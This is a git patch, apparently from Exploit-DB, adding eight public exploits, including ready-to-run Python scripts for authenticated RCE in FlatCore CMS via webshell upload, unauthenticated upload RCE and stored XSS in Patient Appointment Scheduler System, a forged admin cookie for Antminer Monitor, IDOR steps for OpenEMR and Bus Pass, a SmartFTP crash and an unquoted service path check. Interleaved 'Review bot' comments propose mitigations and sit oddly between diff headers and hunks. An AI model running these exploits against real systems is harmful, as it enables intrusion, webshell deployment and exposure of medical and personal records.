From 8f90c99e8cb3edddfce46acc38bcd9652691ae9b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 7 Sep 2021 05:02:00 +0000
Subject: [PATCH] DB: 2021-09-07
8 changes to exploits/shellcodes
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
Argus Surveillance DVR 4.0 - Unquoted Service Path
OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)
FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)
Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
Antminer Monitor 0.5.0 - Authentication Bypass
---
 exploits/multiple/webapps/50267.txt | 48 +++++++++++++++++
 exploits/php/webapps/50260.txt | 18 +++++++
 exploits/php/webapps/50262.py | 80 +++++++++++++++++++++++++++++
 exploits/php/webapps/50263.txt | 25 +++++++++
 exploits/php/webapps/50264.py | 78 ++++++++++++++++++++++++++++
 exploits/php/webapps/50265.py | 75 +++++++++++++++++++++++++++
 exploits/windows/dos/50266.py | 38 ++++++++++++++
 exploits/windows/local/50261.txt | 26 +++++++++
 files_exploits.csv | 8 +++
 9 files changed, 396 insertions(+)
 create mode 100644 exploits/multiple/webapps/50267.txt
 create mode 100644 exploits/php/webapps/50260.txt
 create mode 100755 exploits/php/webapps/50262.py
 create mode 100644 exploits/php/webapps/50263.txt
 create mode 100755 exploits/php/webapps/50264.py
 create mode 100755 exploits/php/webapps/50265.py
 create mode 100755 exploits/windows/dos/50266.py
 create mode 100644 exploits/windows/local/50261.txt
diff --git a/exploits/multiple/webapps/50267.txt b/exploits/multiple/webapps/50267.txt
new file mode 100644
index 000000000..fef214ff0
--- /dev/null
+++ b/exploits/multiple/webapps/50267.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass
+# Date: 09/06/2021
+# Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22
+# Exploit Author: CQR.company / Vulnz.
+# Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
+# Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/
+# Version: 0.5.0
+# Tested on: Windows, Linux, Macos
+
+
+Software is commonly used for Monitoring antminers and could easily be
+found in zoomeye ( 800), shodan ( 500).
+
+For now this is the most popular antminer monitoring tool.
+
+Vulnerability in Antminer Monitor exists because of backdoor or
+misconfiguration done
+
+by developer inside settings file in flask server.
+
+Settings file has a predefined secret string, which would be randomly
+generated, however it is static in this
+build.antminer-monitor/settings.py at
+5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor ·
+GitHub
+
+Secret key is 'super secret key'.
+
+Based on this information we can craft authorization bypass cookies.
+
+Using software flask-unsing we can generate cookie which will provide
+you admin access.
+
+flask-unsign --sign --cookie "{'_fresh': True, '_id':
+b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6',
+'_user_id': '1', 'csrf_token':
+b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret
+key"
+
+Additionally you can use this universal cookie to access web interface
+of flask application.
+
+This cookie can work on all systems in "session" field.
+
+.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU
+
+
+In addition DEBUG = True which means /console works, however it needs pin.
\ No newline at end of file
diff --git a/exploits/php/webapps/50260.txt b/exploits/php/webapps/50260.txt
new file mode 100644
index 000000000..782d1e2f5
--- /dev/null
+++ b/exploits/php/webapps/50260.txt
@@ -0,0 +1,18 @@
+# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)
+# Date: 31/08/2021
+# Exploit Author: Allen Enosh Upputori
+# Vendor Homepage: https://www.open-emr.org
+# Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads
+# Version: 6.0.0
+# Tested on: Linux
+# CVE : CVE-2021-40352
+
+How to Reproduce this Vulnerability:
+
+1. Install Openemr 6.0.0
+2. Login as an Physician
+3. Open Messages
+4. Click Print
+5. Change the existing "noteid=" value to another number
+
+This will reveal everybodys messages Incuding Admin only Messages
\ No newline at end of file
diff --git a/exploits/php/webapps/50262.py b/exploits/php/webapps/50262.py
new file mode 100755
index 000000000..2fa3042b9
--- /dev/null
+++ b/exploits/php/webapps/50262.py
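Review bot: The advisory text in exploits/multiple/webapps/50267.txt ends at the forged cookie and the `DEBUG = True` remark without telling an operator how to close the hole, so a short remediation block at the end of the file is missing. The root cause it describes is a Flask signing key committed to `settings.py` ('super secret key'), which makes session cookies forgeable on every install that ships that file; the fix is a key generated once per installation and kept out of the repository, for example from `secrets.token_hex(32)`, after which cookies signed with the published value stop validating. Deployed instances should also run with `DEBUG = False`, because the debugger PIN is not an access control for a network-reachable service. Proposed trailer: `# Mitigation: replace the static SECRET_KEY with a random per-install value, disable DEBUG, and do not expose the monitor to untrusted networks`.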
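Review bot: The reproduction steps in exploits/php/webapps/50260.txt name the parameter (`noteid=`) but not the missing control, and the same gap is in exploits/php/webapps/50263.txt for `viewid`. In both cases the server returns the record for whatever identifier is supplied, so the fix is a server-side authorization check that the logged-in user may read that specific record, not a change to how the identifier is presented. I would add a line such as `# Mitigation: verify on the server that the session user is entitled to the requested noteid before rendering the message`, and for 50260.txt a pointer to the vendor fix for CVE-2021-40352 once it is identified. 50260.txt also never states the request path behind "Click Print", which a defender needs in order to search access logs for one session walking through many identifiers.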
@@ -0,0 +1,80 @@
+# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
+# Date: 04/10/2021
+# Exploit Author: Mason Soroka-Gill @sgizoid
+# Vendor Homepage: https://flatcore.org/
+# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
+# Version: 2.0.7
+# Tested on: Ubuntu Server 21.04
+# CVE: CVE-2021-39608
+# References:
+# - https://github.com/flatCore/flatCore-CMS/issues/52
+
+#!/usr/bin/env python3
+
+import sys
+import requests
+from lxml import html
+from urllib.parse import urlencode
+
+if len(sys.argv) != 4:
+ print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
+ exit(1)
+
+TARGET = sys.argv[1]
+USERNAME = sys.argv[2]
+PASSWORD = sys.argv[3]
+
+# attempt to log in
+resp = requests.post(f"{TARGET}/index.php?p=1",
+ data={
+ "login_name":f"{USERNAME}",
+ "login_psw":f"{PASSWORD}",
+ "login":"Anmelden"})
+
+# grab the PHP session ID
+PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]
+
+# validate credentials worked
+resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
+ headers={"Cookie":PHPSESSID})
+if resp.status_code != 200:
+ print("Invalid credentials")
+ exit(1)
+else:
+ print("Logged in")
+
+# grab the csrf token for the script upload
+csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value
+
+# post the shell to the host
+resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
+ data={"upload_type":"plugin", "csrf_token":csrf_token}, # the csrf token
+ files={"file":("sgizoid.php", "")}, # the webshell
+ headers={"Cookie":PHPSESSID}) # the php session id
+
+# pretend to be a shell
+while True:
+ command = input("$ ")
+ if command.lower() == "exit" or command.lower() == "q":
+ break
+ resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
+ # verify payload succeeded
+ if resp.status_code == 200:
+ print(resp.text)
+ else:
+ print("Error: Something went wrong, maybe the shell didn't work?")
+ break
+
+# delete the webshell
+resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
+ headers={"Cookie":PHPSESSID})
+if resp.status_code == 200:
+ print("Cleaned up webshell")
+
+# clean up the session
+resp = requests.get(f"{TARGET}/index.php?goto=logout",
+ headers={"Cookie":PHPSESSID})
+if resp.status_code == 200:
+ print("Logged out")
+
+exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/50263.txt b/exploits/php/webapps/50263.txt
new file mode 100644
index 000000000..7ee58b271
--- /dev/null
+++ b/exploits/php/webapps/50263.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
+# Date: 2021-09-05
+# Exploit Author: sudoninja
+# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 10 - XAMPP Server
+
+# Vulnerable page :
+
+http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
+
+# Vulnerable paramater :
+
+The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
+
+# Proof Of Concept :
+
+# 1 . Download And install [ bus-pass-management-system ]
+# 2 . Go to /admin/index.php and Enter Username & Password
+# 3 . Navigate to search >> search pass
+# 4 . Click on the view and enter the change viewid into the Url
+
+Use :
+http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]
\ No newline at end of file
diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py
new file mode 100755
index 000000000..73553d1da
--- /dev/null
+++ b/exploits/php/webapps/50264.py
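Review bot: The header comment of exploits/php/webapps/50262.py gives the CVE and the upstream issue but nothing a site owner can act on, and the request sequence below it is the only place the root cause is visible: an authenticated POST to `acp/core/files.upload-script.php` with `upload_type=plugin` stores a `.php` file under the web-served `upload/plugins/` directory. I would add `# Mitigation: deny script execution under /upload/, restrict ACP accounts, and follow flatCore-CMS issue #52 for the fix` to the header. Because the script deletes the uploaded file and logs out before exiting, what remains on an affected host is in the web-server access log (the upload POST followed by GETs to `upload/plugins/` carrying a query string), which is worth stating for responders. Separately, the `#!/usr/bin/env python3` line sits after the comment header, where it has no effect as a shebang.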
@@ -0,0 +1,78 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import time
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
+╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m
+ \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m
+ \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m
+ \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m
+ \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m
+ \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m
+"""
+
+
+def exploit(url:str, file:str, delay:int) -> None:
+ if not os.path.exists(file):
+ logging.error(f'webshell payload "{file}"" does not exist?')
+ return
+ logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
+ uploadTime = int(time.time())
+ r = requests.post(url + '/classes/SystemSettings.php',
+ files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
+ params={'f' : 'update_settings'},
+ verify=False
+ )
+ if not r.ok:
+ logging.error('HTTP upload request failed')
+ return
+ logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
+ for i in range(uploadTime - delay, uploadTime + delay + 1):
+ r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
+ logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
+ # NOTE: website will send redirects for all files that do not exist
+ if r.status_code != 302:
+ logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
+ return
+ logging.error('failed to find payload on target')
+ logging.warning('maybe need a larger delay or uploads directory is not writable?')
+ return
+
+
+if __name__ == '__main__':
+ # parse arguments
+ parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+ parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
+ parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
+ parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
+ parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
+ args = parser.parse_args()
+ # define logger
+ logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+ logging.SUCCESS = logging.CRITICAL + 1
+ logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+ logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
+ logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+ logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
+ logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+ # print banner
+ print(BANNER)
+ # run exploit
+ exploit(args.url, args.payload, args.delay)
\ No newline at end of file
diff --git a/exploits/php/webapps/50265.py b/exploits/php/webapps/50265.py
new file mode 100755
index 000000000..de3603f08
--- /dev/null
+++ b/exploits/php/webapps/50265.py
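Review bot: Neither exploits/php/webapps/50264.py nor exploits/php/webapps/50265.py states the defect both rely on: the POST to `classes/SystemSettings.php` with `f=update_settings` is sent without any session or credentials, so the settings endpoint is reachable unauthenticated. I would add to both headers a line such as `# Root cause: f=update_settings performs no authentication check; mitigation: require an admin session, restrict upload types, and serve /uploads/ without script execution`, and for 50265.py that the `about_us` value must be encoded when it is rendered. For responders, the lookup loop in `exploit()` requests `/uploads/<unix time>_<name>` for consecutive timestamps and, per the code comment, the application answers 302 for names that do not exist, so the upload is followed in the access log by a run of redirects for sequentially numbered paths.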
@@ -0,0 +1,75 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═══════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║
+╚═══════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m
+ \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m
+ \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m
+ \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m
+ \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m
+ \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m
+"""
+
+
+def exploit(url:str, file:str) -> None:
+ if not os.path.exists(file):
+ logging.error(f'{file} does not exist?')
+ return
+ logging.info(f'reading {file} for XSS content ...')
+ with open(file, 'r') as f:
+ xssPayload = f.read()
+ logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
+ r = requests.post(url + '/classes/SystemSettings.php',
+ data={'about_us' : xssPayload},
+ params={'f' : 'update_settings'},
+ verify=False
+ )
+ if not r.ok:
+ logging.error('HTTP request failed')
+ return
+ logging.info('checking for XSS payload on main page ...')
+ r = requests.get(url)
+ if xssPayload not in r.text:
+ logging.error(f'XSS injection failed? received: {r.text}')
+ logging.warning('maybe about.html is not writable?')
+ return
+ logging.success('XSS payload found on target website')
+ return
+
+
+if __name__ == '__main__':
+ # parse arguments
+ parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+ parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
+ parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
+ parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
+ args = parser.parse_args()
+ # define logger
+ logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+ logging.SUCCESS = logging.CRITICAL + 1
+ logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+ logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
+ logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+ logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
+ logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+ # print banner
+ print(BANNER)
+ # run exploit
+ exploit(args.url, args.file)
\ No newline at end of file
diff --git a/exploits/windows/dos/50266.py b/exploits/windows/dos/50266.py
new file mode 100755
index 000000000..8327b66c3
--- /dev/null
+++ b/exploits/windows/dos/50266.py
@@ -0,0 +1,38 @@
+# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
+# Date: 9/5/2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: https://www.smartftp.com/en-us/
+# Software Link: https://www.smartftp.com/en-us/download
+# Version: 10.0.2909.0 (32 and 64 bit)
+# Tested on: Microsoft Windows 10 32 bit and 64 bit
+
+=========================================================================
+
+buffer = "//"
+buffer += "A" * 423
+
+f = open ("path.txt", "w")
+f.write(buffer)
+f.close()
+
+1. Run the python script
+2. Open SmartFTP > New Connection > FTPS (explicit)
+3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
+4. In Path, copy paste the content of the "path.txt" generated by the python script
+5. Click "OK"
+6. SmartFTP client crashes
+
+=======================================================================
+1. Open SmartFTP > New Connection > FTPS (explicit)
+2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
+3. In Path, type slash ("/") and click "OK"
+4. The app should return "Error 0x80072741"
+5. In the path's search bar, replace slash ("/") with whatever and press enter
+6. SmartFTP client crashes
+
+=======================================================================
+
+1. Open SmartFTP
+2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
+3. Once the history is empty, click the bar and type anything
+3. SmartFTP client crashes
\ No newline at end of file
diff --git a/exploits/windows/local/50261.txt b/exploits/windows/local/50261.txt
new file mode 100644
index 000000000..d9aaca217
--- /dev/null
+++ b/exploits/windows/local/50261.txt
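Review bot: exploits/windows/dos/50266.py is committed with a `.py` name and mode 100755, but apart from the header comments only five statements are Python; the `====` separator lines and the three numbered reproduction lists are bare text, so the file does not parse. The prose should be prefixed with `#` or moved into a module docstring, or the entry should be stored as `.txt` like the other write-ups in this commit. The last list is numbered 1, 2, 3, 3. The header names the affected build `10.0.2909.0` but gives no fixed version or vendor reference, which a reader needs to decide whether an installed client is still affected.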
@@ -0,0 +1,26 @@
+# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
+# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Date: 03.09.2021
+# Version: Argus Surveillance DVR 4.0
+# Tested on: Windows 10
+
+# Note: "Start as service on Windows Startup" must be enabled in Program Options
+
+# Proof of Concept:
+
+C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Argus Surveillance DVR Watchdog
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+Argus Surveillance DVR Watchdog ARGUSSURVEILLANCEDVR_WATCHDOG C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe Auto
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 79d5d666a..d326abffd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
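Review bot: The proof of concept in exploits/windows/local/50261.txt shows that `BINARY_PATH_NAME` is unquoted and that the service runs as `LocalSystem`, but not the condition that decides whether this matters on a given host, namely whether a non-administrative user can create files in `C:\` or `C:\Program Files`. Standard users normally cannot, so the write-up should either include the ACLs of those directories (for example `icacls` output) or say that the finding depends on weakened permissions. The remediation is also missing: the service's image path should be stored quoted, `"C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe"`, and the file gives no vendor reference or fixed version.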
@@ -6798,6 +6798,7 @@ id,file,description,date,author,type,platform,port
 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
 50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
+50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service",1970-01-01,"Eric Salario",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -11383,6 +11384,7 @@ id,file,description,date,author,type,platform,port
 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
+50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44382,3 +44384,9 @@ id,file,description,date,author,type,platform,port
 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
 50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory/Path Traversal",1970-01-01,"Eric Salario",webapps,php,
+50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
+50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
+50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
+50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php,
+50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS",1970-01-01,a-rey,webapps,php,
+50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,